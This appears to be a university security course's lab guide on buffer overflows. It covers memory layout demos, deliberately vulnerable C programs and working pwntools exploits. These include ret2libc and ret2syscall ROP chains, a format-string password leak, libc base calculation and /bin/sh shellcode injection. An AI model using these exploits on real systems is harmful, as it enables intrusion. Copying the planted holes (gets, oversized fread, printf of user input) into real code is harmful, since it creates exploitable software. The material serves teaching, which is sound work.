Lecture Notes
This lecture will present an overview over issues involving Buffers overflow, underflow, or otherwise incorrectly used.
Download here
Related files:
Practical tasks
This guide will complement the lecture slides and present code and descriptions to enable exploitation of buffer vulnerabilities.
Most of the analysis is greatly facilitated if you use Gef. Follow the instructions in the github repository and install it.
The pwntools python package may also be usefull. Install it with python3-pwntools or pip install pwntools when inside a virtual environment.
Memory Structure and Variables
Languages such as C/C++, but not only, allow a great flexibility in the use of variables. From a perspective of types, these languages are not fully type-safe, as the safety of the variable types is limited, and can be commonly circumvented by developers. Recent compilers will provide a great amount of information to developers so that they avoid type errors, but that doesn’t avoid developers from casting variables to incompatible types, especially when dealing with pointers to structures (The cast is valid, but the content structure is not compatible).
Then there is the notion of memory safety, which is simply not present in these languages. A language that is not memory safe will allow developers to access memory with great freedom, exposing the allocated virtual address to the program.
The following program (not_type_safe.c) will provide an insight of the problem. Compile it and run it on your computer. Try to explain the values printed.
int aux = 42 // Integer
int *value = &aux // Pointer to Integer
// Correct usage
printf("%d\n", *value)
printf("%d\n", *(value + 4)) // Reading memory after the variable
printf("%d\n", *(value - 4)) // Reading memory before the variable
printf("%f\n", *((double*) &value)) // Cast to variable with different storage
printf("%llu\n", *((unsigned long long*) &value)) // Cast to variable with different size
The result is something like, which includes the value 42 but also other variations.
42
32693
1
0.000000
140737456555452
A similar program not_memory_safe.c will specifically explore memory safety with dynamic memory. Check it’s output as it will probably be very different from what you expect.
char* buffer = (char*) malloc(10) // Buffer with 10 bytes
char* str = buffer // Pointer to buffer
free(buffer) // Free buffer!
// Write after free (and write beyond buffer)
memcpy(str, "Hello World!!!!", 15)
printf("%s\n", str) // Read after free (and read beyond buffer)
Different variable types will be allocated to different memory areas. This is intrinsic of each program and is broadly defined by how the program is compiled. When the program is loaded, the addresses may change, but they will still respect this notion of areas.
The following program (mem.c) will print the address of several variables that you may find in a program. Some variables are local, some are global, some are static, some are dynamic. Then you also have program arguments and functions. During the creation of a program the programmer will decide how to declare a variable, and this will have some impact on where the variable is placed in memory.
const char cntvar[]="constant"
static char bssvar[4]
// ... OMITTED
int main(int argc, void** argv) {
FILE* fd
char line[1024]
unsigned int mask
unsigned int stack = (unsigned int) &argc
unsigned int heap = (unsigned int) malloc(sizeof(unsigned int))
unsigned int bss = (unsigned int) bssvar
unsigned int cnst = (unsigned int) cntvar
unsigned int text = (unsigned int) &main
memset(&mask,0xff,sizeof(mask))
mask ^= getpagesize() -1
printf("Internal Variables (Page = %u)\n", getpagesize())
printf("&argc = %08x -> stack = %08x\n", stack, stack & mask)
printf("malloc = %08x -> heap = %08x\n", heap, heap & mask)
printf("bssvar = %08x -> bss = %08x\n", bss, bss & mask)
printf("cntvar = %08x -> const = %08x\n", cnst,cnst & mask)
printf("&main = %08x -> text = %08x\n", text,text & mask)
}
You can compile the program with gcc -g -o mem mem.c.
NOTE: Recent versions of GCC implement several mitigations to some of the attacks here described. Because the programs we are going to use are small, which reduces the amount of artifacts, it could be better to use an older GCC using docker. You can run it with
docker run --rm -ti -v $(pwd):/host gcc:8 gcc FLAGS -o /host/output /host/input.c. For this purpose, we provide pre-compiled binaries.
Task:
- Run the program. Compile if you wish, but prefer the provided binaries.
- Match the addresses printed with the different variable types
- Change the location of a variable, or create others of the same type, and see how it affects the resulting address.
The program also allocates memory in the program stack, by calling a function recursively until all memory is exhausted.
void foo(int argc, unsigned int mask, unsigned int c, unsigned int m)
{
char a[4096*0x100]
unsigned int stack = (unsigned int) &argc
printf("foo [%03u]: &argc = %08x -> stack = %08x\n",c,stack, stack & mask)
if(c < m)
foo(argc,mask, c+1, m)
}
Each new function will allocate a variable stack with the value of the argc argument (this could be avoided, and is here for clarification), and then allocates a variable named a of size 4096 * 0x100. 4096 (or 0x1000) is the standard page size, while 0x100 will set the number of pages. The larger this value, the quicker the program exhausts all memory.
A possible result would be:
foo [000]: &argc = 00007ffd6df80038 -> stack = 000000006df80000
foo [001]: &argc = 00007ffd6de7fff8 -> stack = 000000006de7e000
foo [002]: &argc = 00007ffd6dd7ffb8 -> stack = 000000006dd7e000
foo [003]: &argc = 00007ffd6dc7ff78 -> stack = 000000006dc7e000
foo [004]: &argc = 00007ffd6db7ff38 -> stack = 000000006db7e000
foo [005]: &argc = 00007ffd6da7fef8 -> stack = 000000006da7e000
foo [006]: &argc = 00007ffd6d97feb8 -> stack = 000000006d97e000
You should notice that stack allocation grows from higher address to lower addresses. Depending on your system configuration, addresses presented may be constant or slightly random.
Tasks:
- Take notice of how the addresses in your system, and how memory usage evolves.
- Run it multiple times and compare the results.
- Determine the maximum stack size for your system.
Variable allocation
Program state is considered to be ephemeral and resides in memory areas specifically allocated for this purpose. Each function will allocate a new stack frame with local variables, and in some calling conventions, arguments to other functions that are called. Although when developing an application we use variables with specific names, when the code is compiled, variables are only memory spaces (have no names). If the language is not type safe, and/or has no memory management features, memory access may be totally unconstrained, and read/write before or beyond the variable allocated memory space may be possible.
Considering the following program, which declares two variables buffer and message. buffer is a char array with 5 bytes, while message is an array initialized to Hello World.
The for cycle present will write the value A to buffer, but instead of writing only 5 bytes, it will write 15 bytes. The question that arises is, where are these bytes going to be stored?
The program also prints the variable message before and after the the cycle, so it may help us finding this.
To check what happens, save to code to bo.c, compile the program, and execute it ./bo. What you will see is a basic overflow, but more on this later.
#include <stdio.h>
void main(int argc, char* argv[]){
char message[] = "Hello World"
char buffer[5]
int i
printf("buffer=%s message=%s\n", buffer, message)
for(i = 0, i < 15, i++) {
buffer[i] = 'A'
}
printf("buffer=%s message=%s\n", buffer, message)
}
A naive analysis could assume the following output, as buffer contains all 0x0. Another assumption could that that the program crashes.
buffer= message=Hello World
buffer=AAAAAAAAAAAAAAA message=Hello World
Another file available (mem_local.c) will also print the value of several variables. Can be used to see how location declaration affects actual memory allocation.
Tasks:
- Execute the
boandmem_localprograms. - What can you conclude about memory structure of these variables and programs?
- Create a diagram of the memory structure.
- Instead of filling the
bufferwithA, fill it with a variable value (e.g.'A' + i)
Buffer Overflows and TOCTOU
Many operations and not atomic, and specifically when the Time Of Check to Time Of Use is not coincident, it may be possible to invalidate the check, or to change the value of the check, allowing access to additional resources.
The following example code is a crude demonstration of TOCTOU, which can be controlled through a Buffer Overflow. Specifically, the message variable can be used to override the allowed variable, essentially bypassing the previous check.
int main() {
char allowed = 0
char password[8]
char username[8]
char message[32]
puts("username:")
gets(username)
puts("password:")
gets(password)
allowed = strcmp("admin", username) + \
strcmp("topsecrt", password)
puts("message:")
gets(message)
// <-- Issue here
printf("user=%s pass=%s result=%d\n", username, \
password, allowed)
if(allowed == 0)
printf("Access granted. Message sent!\n")
else
printf("Access denied\n")
return 0
}
If you use gdb to analyze the memory, you can check the order of the variables, and notice that message is placed before allowed. Therefore, an overflow of message will write over allowed. The amount of data to write depends on the distance between variables, which can be calculated. An attacker without access to the binary could need a brute force, but we won’t need it.
NOTE: with
gdbyou can use thep) command to show the content of variables.
$ gdb ./toctou
gdb# br main
gdb# r
gdb# $p &allowed
gdb# 0x7ffffffedf2f
gdb# p &username
gdb# 0x7ffffffedf1f
gdb# p &password
gdb# 0x7ffffffedf27
gdb# p &message
gdb# 0x7ffffffedef0
Tasks:
- Run the
prog_2program. If you wish to compile, use these flags:gcc -g -O0 -fno-stack-protector –o prog_2 prog_2.c - Analyze the execution with different payloads
- Determine
- What is the stack base address? (
info frame) - Where is the return information? (
saved RIPininfo frame) - How many bytes can be entered to the message without overflow? (
sizeof message) - How many bytes can be written without damage? (print the variable addresses)
- What happens when an overflow is achieved? (Do it and check the memory content)
- How can the decision be subverted? (Do it and check the memory content)
- What is the stack base address? (
Return to Libc (Ret2Libc)
Ret2Libc (Return-to-Libc) is a binary exploitation technique used to bypass a specific security defense called NX (No-Execute) or DEP (Data Execution Prevention). Instead of injecting new malicious code (shellcode) onto the stack and trying to run it, the attacker reuses code that already exists inside the program’s memory—specifically, functions from the Standard C Library (libc).
In the “old days” of buffer overflows (Stack Smashing), an attacker would inject malicious binary code (shellcode) onto the stack. Then redirect the CPU to jump to the stack, and finally the CPU executes the code. However, Modern systems marked the stack as Non-Executable (NX). If the CPU tries to execute instructions found on the stack, the OS kills the program immediately (Segfault).
Since attackers can’t write new code to the stack and run it, they can look for code that is already executable, and use it.
Almost every C program loads the standard library (libc.so on Linux, msvcrt.dll on Windows). This library contains thousands of powerful functions like printf, strcpy, and most importantly, system.
An overflow can overwrite the Return Address, but instead of pointing it to shellcode, the attacker points it to the address of the system() function inside libc. This is like cutting words out of a magazine (libc) and pasting them together to form sentences. You didn’t write the words yourself; you just rearranged what was already there. The security guard allows the magazine because it’s a trusted item.
To pull this off, an attacker needs to place three specific things into the memory (or registers):
- The Function Address: The memory address where system() lives.
- The Argument: The string
/bin/sh(sosystemknows what to launch). - The Return Address: Where
system()should go after it finishes (often irrelevant, but usually set toexit()to avoid a crash).
It works differently in x86 and x86_64. The concept is the same, but the setup differs because of how arguments are passed.
In 32-bit (x86), arguments are passed on the stack. You simply construct your overflow payload like a sandwich: [ Padding ] + [ Address of system() ] + [ Address of exit() ] + [ Address of "/bin/sh" ]
When the function returns, it jumps to system. system looks at the stack, sees /bin/sh, and executes it.
In 64-bit (x86_64), arguments are passed in registers (specifically, the RDI register for the first argument). You cannot just put /bin/sh on the stack and expect system to see it.
An attack needs a ROP Gadget (like POP RDI; RET). The payload forces the CPU to jump to the gadget first. The gadget pops the address of /bin/sh from the stack into the RDI register, and then the gadget returns to system().
Consider the following program detects the type of image base on the header. The program has a buffer overflow vulnerability in the fread function, which reads more bytes than the allocated buffer size.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void detect_image_format(const char *filename) {
FILE *file = fopen(filename, "rb");
if (!file) {
printf("Error: Could not open file %s\n", filename);
return;
}
unsigned char header[8];
// Since header is only 8 bytes, this causes a Buffer Overflow.
size_t bytesRead = fread(header, 1, 128, file);
fclose(file);
if (bytesRead < 2) {
printf("File is too small to be an image.\n");
return;
}
if (header[0] == 0x42 && header[1] == 0x4D)
printf("[+] Detected: BMP Image\n");
else if (header[0] == 0xFF && header[1] == 0xD8 && header[2] == 0xFF)
printf("[+] Detected: JPG Image\n");
else if (header[0] == 0x89 && header[1] == 0x50 && header[2] == 0x4E && header[3] == 0x47)
printf("[+] Detected: PNG Image\n");
else
printf("[-] Unknown file format.\n");
}
int main(int argc, char** argv) {
if (argc == 2)
detect_image_format(argv[1]);
else
printf("Usage: %s image\n", argv[0]);
return 0;
}
Tasks:
- Compile the program with
gcc -o image_identifier image_identifier.c -no-pie -fno-stack-protector -z execstack -g - Analyze the program with
gdband determine the buffer overflow vulnerability. - Create a payload that overflows the buffer and overwrites the return address to call
system("/bin/sh"). - Use
pwntoolsto create the payload. Consider the following script, ajusting the values as needed.- you will need to set the correct
BASE_ADDRfor your libc version and system. (Use GDB andinfo proc mappingsto find the base address of libc when the program is running) - Adjust the
padding_sizeaccording to the overflow point (buffer size + saved RBP size). (Use GDB andinfo frameto find the offset)
- you will need to set the correct
from pwn import *
import sys
import os
def create_payload():
exe = ELF("./image_identifier")
rop = ROP(exe.libc)
BASE_ADDR = # Libc address; adjust as needed
addr_system = libc.sym['system'] + BASE_ADDR
addr_exit = libc.sym['exit'] + BASE_ADDR
addr_binsh = next(libc.search(b'/bin/sh')) + BASE_ADDR
addr_pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + BASE_ADDR
addr_ret = rop.find_gadget(['ret']).address + BASE_ADDR
print(f"[*] System addr: {hex(addr_system)}")
print(f"[*] /bin/sh addr: {hex(addr_binsh)}")
print(f"[*] pop rdi addr: {hex(addr_pop_rdi)}")
print(f"[*] ret addr: {hex(addr_ret)}")
padding_size = # Adjust according to overflow point
padding = b"A" * padding_size
rop_chain = p64(addr_ret) # 0. Align stack
rop_chain += p64(addr_pop_rdi) # 1. pop rdi; ret
rop_chain += p64(addr_binsh) # 2. address of /bin/sh (into rdi)
rop_chain += p64(addr_system) # 3. address of system
rop_chain += p64(addr_exit) # 4. clean exit
return padding + rop_chain
if __name__ == "__main__":
payload = create_payload()
filename = "exploit_image.bmp"
with open(filename, "wb") as f:
f.write(payload)
Tasks:
- Run the script to create the exploit image file.
- Run the vulnerable program with the exploit image as argument:
./image_identifier exploit_image.bmp - If successful, you should get a shell.
- Use
gdbto analyze the execution and verify the register values before thesysteminstruction. You can break to the last line before theretof functiondetect_image_format.
Return to Syscall (ret2syscall)
A Return-to-Syscall (ret2syscall) attack is a specific type of Return-Oriented Programming (ROP) exploit. Instead of jumping to a standard library function (like system() in libc), the attacker constructs a ROP chain that manually loads the CPU registers with specific values and then executes the syscall instruction to request an action directly from the OS kernel.
This is often used when system() is unavailable, when the attacker is dealing with a static binary (where libc offsets might not work the same way), or to bypass certain runtime protections that hook or monitor standard library calls.
How it differs from ret2libc:
ret2libc(Previous Example): You set up the arguments and jump to the address ofsystem(). The system function then handles the heavy lifting of talking to the kernel.ret2syscall: You act as the wrapper function. You manually put thesyscallnumber and arguments into registers, then trigger the kernel interrupt yourself.
In x86-64 Linux, system calls follow a strict convention. To spawn a shell using execve("/bin/sh", 0, 0), you must set up the registers as follows:
RAX: Stores the Syscall Number. (Forexecve, this is59or0x3b).RDI: Stores the first argument (filename, pointer to"/bin/sh").RSI: Stores the second argument (argv, usually 0 or NULL for a simple shell).RDX: Stores the third argument (envp, usually 0 or NULL).
The payload construction is similar to ret2libc, but instead of jumping to system(), you jump to a syscall instruction after setting up the registers:
- Padding: Fill the buffer up to the return address.
- Gadget 1:
pop rax; ret-> Overwrite RIP to jump here. - Value 1:
0x3b(59) -> Pops intoRAX. - Gadget 2:
pop rdi; ret - Value 2: Address of
/bin/sh-> Pops intoRDI. - Gadget 3:
pop rsi; ret - Value 3:
0x0-> Pops intoRSI. - Gadget 4:
pop rdx; ret - Value 4:
0x0-> Pops intoRDX. - Gadget 5:
syscall; ret-> The kernel sees the values in the registers and executes execve.
Consider the same program as before (image_identifier.c). Consider the following script to create the payload for a ret2syscall attack:
from pwn import *
import sys
import os
def create_payload():
exe = ELF('./image_identifier', checksec=False)
libc = exe.libc
libc.address = # Adjust according to your system and libc version
rop = ROP(libc)
addr_binsh = next(libc.search(b'/bin/sh'))
addr_pop_rax = rop.find_gadget(['pop rax', 'ret']).address
addr_pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
addr_pop_rsi = rop.find_gadget(['pop rsi', 'ret']).address
# Gadget: pop rdx; ret (Arg 3: envp)
# Note: 'pop rdx; ret' is rare. We often find 'pop rdx; pop rbx; ret' or similar.
# Pwntools ROP engine tries to find the cleanest one.
# We use try/except here specifically for RDX as it's the most volatile.
gadget_rdx = rop.find_gadget(['pop rdx', 'ret'])
if not gadget_rdx:
# Fallback to a complex gadget if simple one fails (common in libc)
gadget_rdx = rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])
if not gadget_rdx:
print("[-] Error: Could not find a suitable 'pop rdx' gadget.")
sys.exit(1)
addr_pop_rdx = gadget_rdx.address
# Gadget: syscall; ret
addr_syscall = rop.find_gadget(['syscall', 'ret']).address
# Verbose Output
print(f"[*] /bin/sh addr: {hex(addr_binsh)}")
print(f"[*] pop rax addr: {hex(addr_pop_rax)}")
print(f"[*] pop rdi addr: {hex(addr_pop_rdi)}")
print(f"[*] pop rsi addr: {hex(addr_pop_rsi)}")
print(f"[*] pop rdx addr: {hex(addr_pop_rdx)}")
print(f"[*] syscall addr: {hex(addr_syscall)}")
padding_size = # Adjust this value based on the buffer overflow offset
padding = b"A" * padding_size
# --- ROP CHAIN CONSTRUCTION ---
# We are constructing execve("/bin/sh", 0, 0) via syscall.
# Syscall number for execve is 59 (0x3b).
rop_chain = b""
# 1. Set RAX = 59 (Syscall Number)
rop_chain += p64(addr_pop_rax)
rop_chain += p64(59)
# 2. Set RDI = address of "/bin/sh" (Arg 1)
rop_chain += p64(addr_pop_rdi)
rop_chain += p64(addr_binsh)
# 3. Set RSI = 0 (Arg 2: argv)
rop_chain += p64(addr_pop_rsi)
rop_chain += p64(0)
# 4. Set RDX = 0 (Arg 3: envp)
rop_chain += p64(addr_pop_rdx)
rop_chain += p64(0)
# Check if our RDX gadget pops extra registers (like 'pop rdx; pop rbx; ret')
# If so, we need to provide padding for those extra pops.
if 'pop rbx' in str(gadget_rdx):
print("[*] Note: RDX gadget pops RBX as well. Adding padding.")
rop_chain += p64(0) # Padding for RBX
# 5. Execute Syscall
rop_chain += p64(addr_syscall)
return padding + rop_chain
if __name__ == "__main__":
context.arch = 'amd64'
payload = create_payload()
filename = "exploit_image.bmp"
with open(filename, "wb") as f:
f.write(payload)
Tasks:
- Adjust the
LIBC_BASEvalue according to your system and libc version. - Adjust the
padding_sizeaccording to the overflow point (buffer size + saved RBP size). - Run the script and create the
exploit_image.bmpfile. - Run the
image_identifierprogram with the created file as argument and verify that a shell is spawned. - Use
gdbto analyze the execution and verify the register values before thesyscallinstruction. You can break to the last line before theretof functiondetect_image_format.
The Relevancy of Information leaks
Information leaks are vulnerabilities that allow an attacker to gain access to sensitive information from a system or application. This information can include memory addresses, stack canaries, or other data that can be used to facilitate further attacks, such as buffer overflows or return-oriented programming (ROP) attacks. In the previous examples, we assumed that the attacker had knowledge of the base address of libc. In real-world scenarios, this information is often not directly available due to security mechanisms like Address Space Layout Randomization (ASLR). However, information leaks can provide the necessary details to bypass these protections.
Consider that in the last examples, we used hardcoded addresses for libc functions and gadgets. In a real-world scenario, an attacker would need to find a way to leak these addresses. This could be done through various means, such as exploiting format string vulnerabilities, using side-channel attacks, or leveraging other vulnerabilities in the application.
Modify the previous C programs to write the address of a libc function (like printf or puts) to the output. This can be done by simply printing the address of the function using the %p format specifier.
int main() {
// Other code...
printf("Address of printf: %p\n", printf);
// Other code...
}
Now, when you run the program, it will output the address of printf. An attacker can use this information to calculate the base address of libc and subsequently determine the addresses of other functions and gadgets needed for a ret2libc or ret2syscall attack.
from pwn import *
import sys
import os
def leak_libc_address():
p = process('./image_identifier')
p.recvuntil(b'Address of printf: ')
leak = p.recvline().strip()
printf_addr = int(leak, 16)
log.info(f"Leaked printf address: {hex(printf_addr)}")
if __name__ == "__main__":
leak_libc_address()
With the leaked address, you can calculate the base address of libc by subtracting the known offset of printf in your libc version. This allows you to dynamically construct your exploit payload without relying on hardcoded addresses.
The offset can be found using tools like readelf or objdump on your libc binary. This approach makes your exploit more robust and adaptable to different environments where ASLR is enabled. This is a common technique used by attackers to bypass modern security mechanisms, and the reason why in CTFs, the information about the libc version is often provided.
We do not know the base address of libc, but if we leak the address of printf, we can calculate it as follows:
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = printf_addr - libc.symbols['printf']
log.info(f"Calculated libc base address: {hex(libc_base)}")
This calculated base address can then be used to find the addresses of other functions and gadgets needed for the exploit. It also works with binaries in remote servers, as long as the same libc version is used.
Tasks:
- Modify the previous
Cprograms to leak the address of a libc function. - Create a script to capture the leaked address and calculate the base address of libc.
- Use the calculated base address to construct a ret2libc or ret2syscall payload dynamically.
- Test the complete exploit to verify that it works without hardcoded addresses.
What if we do not know the libc version? In this case, we can use libc-database to find the correct version. The database contains a large number of libc versions with their respective offsets. By providing the leaked address and the offset of a known function, we can search the database for matching libc versions.
from pwn import *
import sys
import os
def find_libc_version(printf_addr):
db = LibcSearcher('printf', printf_addr)
libc_base = printf_addr - db.dump('printf')
log.info(f"Identified libc version: {db.libc_name}")
log.info(f"Calculated libc base address: {hex(libc_base)}")
return libc_base, db
if __name__ == "__main__":
printf_addr = 0x7ffff7a33440 # Example leaked address
find_libc_version(printf_addr)
Tasks:
- Use the
libc-databaseto identify the libc version based on a leaked function address. - Integrate this into your exploit script to dynamically find the libc version and construct the payload.
- Test the complete exploit to verify that it works without prior knowledge of the libc version.
Format String Attacks
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system. It also could be used to leak information about the memory layout of the application, which could be useful for further exploitation, such as in Return Oriented Programming (ROP) attacks.
The attack could be executed when the application doesn’t properly validate the submitted input. In this case, if a Format String parameter, like %x, is inserted into the posted data, the string is parsed by the Format Function, and the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the memory.
Consider the following example (printf_login), which has this vulnerability. The password is random, but the user is printed directly in a wrong manner.
Also, an invalid check is made, resulting the in the possibility of exploiting the username variable in order to leak the password and then access the system.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/random.h>
#include <unistd.h>
char *ref_user = "root";
char ref_pass[1024];
void init_pass(char *s, const int len) {
getrandom(s, len, 0);
static const char alphanum[] = "0123456789#$!ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
for (int i = 0; i < len; ++i) {
s[i] = alphanum[((unsigned char) s[i]) % (sizeof(alphanum) - 1)];
}
s[len] = 0;
}
void check_user_pass(char* ref_user, char* ref_pass) {
char username[64];
char password[64];
memset(username, 0, 64);
memset(password, 0, 64);
fprintf(stdout, "User: ");
fgets(username, sizeof(username), stdin);
// VULNERABILITY HERE
printf(username);
fprintf(stdout,"\n");
// Strip newline if present for comparison
username[strcspn(username, "\n")] = 0;
if (strncmp(username, ref_user, strlen(ref_user)) != 0) {
printf("Invalid user\n");
exit(-1);
}
printf("Pass: ");
fgets(password, sizeof(password), stdin);
if (strncmp(password, ref_pass, strlen(ref_pass)) != 0) {
printf("Invalid password.\n");
exit(-2);
}
}
int main() {
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
printf("Generating Random Pass...");
init_pass(ref_pass, 16);
printf("Done\n");
check_user_pass(ref_user, ref_pass);
printf("Access Granted\n");
}
Before you start it is important to determine the printf argument offset. The offset refers to the distance between the stack pointer (where printf thinks its arguments begin) and the location of your user-controlled format string buffer. Finding this offset is the critical first step in exploiting a format string vulnerability because it allows you to read from or write to specific memory addresses.
Typically in x86_64 architectures the value will be around 6, due to the calling convention in use. To determine it, provide a payload in the format b'%{offset}$xaaaaaaaa', and change the value of the offset until the output contains 61616161.
Tasks:
- Run the the
printf_loginor compile and run the code presented. gcc printf_login.c -o printf_login -no-pie -fno-stack-protector -z execstack- Find how you can provide some payload besides the
username
Because the credentials are dynamic, a script is needed. The process can be facilitated with pwntools, as it supports the methods for interacting with applications. Consider the following script:
from pwn import *
import sys
context.binary = binary = ELF('./printf_login')
def solve():
p = process()
offset = 6 # X86_64 calling convention offset for first user input
fmt = f"root%{offset}$s".encode()
p.sendlineafter(b'User: ', fmt) # Send payload to leak password
leak = p.recvuntil(b'\n\n').strip() # Read until double newline
log.info(f"Received: {leak}") # Log the received data
password = leak[4:] # Extract password after 'root'
log.success(f"Leaked Password: {password.decode('latin-1')}") # Log the leaked password
p.sendline(password) # Send the leaked password
log.info(p.recvall().decode('latin-1'))
if __name__ == "__main__":
solve()
Tasks:
- Use the script and verify than you can get the password
- Explain what happened. You can use gdb to check the memory structure.
Shellcode
Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is typically written in machine code and is designed to be injected into a running program to alter its execution flow. The term “shellcode” originates from its initial purpose, which was to spawn a command shell (like /bin/sh on Unix systems) when executed.
Shellcode was popularized in the context of buffer overflow attacks, where an attacker would exploit a vulnerability to overwrite a program’s memory and insert their own code. When the program executed this code, it would give the attacker control over the system, often by providing a shell. It applied not only to spawning shells but also to performing various malicious actions, such as downloading and executing files, escalating privileges, or creating backdoors. Intel 32-bit architecture (x86) was the most common target for shellcode due to its widespread use in personal computers and servers. However, with the rise of 64-bit systems, ARM architectures (commonly used in mobile devices) have also become significant targets.
Shellcode is typically written in assembly language, which is then assembled into machine code. The code must be compact and efficient, as it often needs to fit within tight constraints imposed by the vulnerability being exploited. Additionally, shellcode must avoid certain characters (like null bytes) that could terminate strings or cause other issues when injected into a program.
Current systems implement several security mechanisms to prevent the execution of shellcode, such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). These mechanisms make it more challenging for attackers to successfully execute shellcode, but they have not eliminated the threat entirely. This is only for educational purposes as modern systems have protections against such attacks. However, understanding shellcode is crucial for cybersecurity professionals, and it remains relevant in specific contexts such as IoT devices and embedded systems, OT environments, and legacy systems.
Consider the following vulnerable program (shellcode_exec.c), which has a buffer overflow vulnerability. The program reads input into a fixed-size buffer without proper bounds checking, allowing an attacker to overwrite the return address and execute arbitrary code.
#include <stdio.h>
#include <string.h>
void vulnerable_function() {
char buffer[64];
printf("Enter some data: ");
fgets(buffer, 256, stdin); // Vulnerable function
printf("You entered: %s\n", buffer);
}
int main() {
vulnerable_function();
return 0;
}
A shellcode can be injected into the buffer to exploit the vulnerability. A large repository of shellcodes is available at https://shell-storm.org/shellcode/. Take in consideration the architecture and operating system of the target system. The Stack also needs to be executable, so the program must be compiled with the following flags: -no-pie -fno-stack-protector -z execstack.
Below is an example of a simple shellcode that spawns a shell (/bin/sh) on an x86_64 Linux system:
section .text
global _start
_start:
; execve("/bin/sh", NULL, NULL)
xor rax, rax ; Clear rax
mov rbx, 0x68732f6e69622f ; Push "/bin/sh" onto the stack
push rbx
mov rdi, rsp ; Pointer to "/bin/sh"
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
mov al, 59 ; syscall number for execve
syscall ; Invoke the kernel
To compile the shellcode, use the following commands:
nasm -f elf64 -o shellcode.o shellcode.asm
ld -o shellcode shellcode.o
---
objdump -d shellcode
---
Extract the machine code bytes from the disassembly output. The shellcode bytes will look something like this (actual bytes may vary):
0000000000401000 <_start>:
401000: 48 31 c0 xor %rax,%rax
401003: 48 bb 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rbx
40100a: 73 68 00
40100d: 53 push %rbx
40100e: 48 89 e7 mov %rsp,%rdi
401011: 48 31 f6 xor %rsi,%rsi
401014: 48 31 d2 xor %rdx,%rdx
401017: b0 3b mov $0x3b,%al
401019: 0f 05 syscall
Is this code familiar? It is the same shellcode presented in previous examples, but now we are injecting it directly into the vulnerable program, instead of using ret2syscall.
To exploit the vulnerable program using the shellcode, you can create a Python script that constructs the payload and sends it to the program. Below is an example script that does this:
from pwn import *
import sys
context.binary = binary = ELF('./shellcode_exec')
def create_payload():
shellcode = (
b"\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e"
b"\x2f\x73\x68\x00\x53\x48\x89\xe7"
b"\x48\x31\xf6\x48\x31\xd2\xb0\x3b"
b"\x0f\x05"
)
padding_size = 64 - len(shellcode) + 8 # Adjust based on buffer size
print(f"Padding size: {padding_size}")
padding = b"A" * padding_size
ret_address = p64(0x7fffffffded0) # Adjust to the address of the buffer
with open("shellcode.bin", "wb") as f:
f.write(shellcode + padding + ret_address)
return shellcode + padding + ret_address
if __name__ == "__main__":
payload = create_payload()
p = process('./shellcode_exec')
p.sendline(payload)
p.interactive()
Tasks:
- Compile the vulnerable program with
gcc -o shellcode_exec shellcode_exec.c -no-pie -fno-stack-protector -z execstack -g - Adjust the
ret_addressin the script according to your system. You can usegdbto find the correct address where the shellcode will be located in memory. - Run the script to exploit the vulnerable program and spawn a shell.
- Use
gdbto analyze the execution and verify that the shellcode is executed correctly. You can set a breakpoint at the start of thevulnerable_functionand step through the execution to see the shellcode in action.
Further Reading
- Smashing The Stack For Fun And Profit
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
- Hacking: The Art of Exploitation
- Practical Binary Analysis
- The Art of Software Security Assessment
- Buffer Overflow Attacks: Detect, Exploit, Prevent
- Libc Database
- Shell-Storm Shellcode Repository
- Pwntools Documentation
- GDB Documentation
- ROP Emporium
- CTF Field Guide